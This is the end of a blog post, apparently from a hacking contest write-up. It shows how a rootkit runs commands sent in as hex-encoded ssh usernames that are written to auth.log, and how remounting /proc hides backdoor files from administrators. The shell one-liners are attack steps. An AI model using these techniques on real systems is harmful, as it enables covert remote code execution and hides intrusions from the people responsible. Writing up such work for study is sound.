<p>This can be exploited by trying to log in with a specially crafted username via ssh. The ssh server writes an error message to /var/log/auth.log and since the error message contains the username, this can be used to remotely inject arbitrary code to the system:</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;"># Hex-encode our shell command:</span>
<span style="color: #c20cb9; font-weight: bold;">perl</span> <span style="color: #660033;">-e</span> <span style="color: #ff0000;">'print &quot;LEGO&quot;.unpack(&quot;H*&quot;,&quot;id &amp;gt; /tmp/auth.owned&quot;).&quot;\n&quot;'</span>
LEGO6964203e202f746d702f617574682e6f776e6564
<span style="color: #666666; font-style: italic;"># Use the resulting string as a username for an ssh login to get the command executed:</span>
<span style="color: #c20cb9; font-weight: bold;">ssh</span> LEGO6964203e202f746d702f617574682e6f776e6564<span style="color: #000000; font-weight: bold;">@</span>target_ip</pre></td></tr></table><p class="theCode" style="display:none;"># Hex-encode our shell command:
perl -e 'print &quot;LEGO&quot;.unpack(&quot;H*&quot;,&quot;id &amp;gt; /tmp/auth.owned&quot;).&quot;\n&quot;'
LEGO6964203e202f746d702f617574682e6f776e6564
# Use the resulting string as a username for an ssh login to get the command executed:
ssh LEGO6964203e202f746d702f617574682e6f776e6564@target_ip</p></div>

<p>After installing the backdoor programs to /proc, we can remount the proc filesystem to hide the files from the administrator:</p>

<div class="wp_syntax" style="position:relative;"><table><tr><td class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">mount</span> <span style="color: #660033;">-t</span> proc proc <span style="color: #000000; font-weight: bold;">/</span>proc</pre></td></tr></table><p class="theCode" style="display:none;">mount -t proc proc /proc</p></div>

<p>Since the files still exist hidden below the proc filesystem, they are not listed as deleted files in /proc/pid/fd.</p></body></html>
			</div><!-- .entry-content -->

	<footer class="entry-meta">
		This entry was posted in <a href="https://www.jakoblell.com/blog/category/security/" rel="category tag">Security</a> by <a href="https://www.jakoblell.com/blog/author/jakob/">Jakob</a>. Bookmark the <a href="https://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/" title="Permalink to [Hacking-Contest] Rootkit" rel="bookmark">permalink</a>.
		
			</footer><!-- .entry-meta -->
</article><!-- #post-136 -->

						<div id="comments">
	
	
			<h2 id="comments-title">
			1 thought on &ldquo;<span>[Hacking-Contest] Rootkit</span>&rdquo;		</h2>

		
		<ol class="commentlist">
					<li class="post pingback">
		<p>Pingback: <a href='http://zaufanatrzeciastrona.pl/post/weekendowa-lektura-powraca/' rel='external nofollow ugc' class='url'>Weekendowa Lektura powraca | Zaufana Trzecia Strona</a></p>
				</li><!-- #comment-## -->
		</ol>

		
				<p class="nocomments">Comments are closed.</p>
		
	
	
</div><!-- #comments -->

				
			</div><!-- #content -->
		</div><!-- #primary -->


	</div><!-- #main -->

	<footer id="colophon" role="contentinfo">

			

			<div id="site-generator">
												<a href="https://wordpress.org/" class="imprint" title="Semantic Personal Publishing Platform">
					Proudly powered by WordPress				</a>
			</div>
	</footer><!-- #colophon -->
</div><!-- #page -->

<script type='text/javascript' src='https://www.jakoblell.com/blog/wp-content/plugins/wp-syntax/js/wp-syntax.js?ver=1.1' id='wp-syntax-js-js'></script>
<script type='text/javascript' src='https://www.jakoblell.com/blog/wp-includes/js/wp-embed.min.js?ver=5.8.6' id='wp-embed-js'></script>

</body>
</html>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.boldgrid.com/w3-total-cache/


Served from: www.jakoblell.com @ 2022-11-20 13:37:31 by W3 Total Cache
-->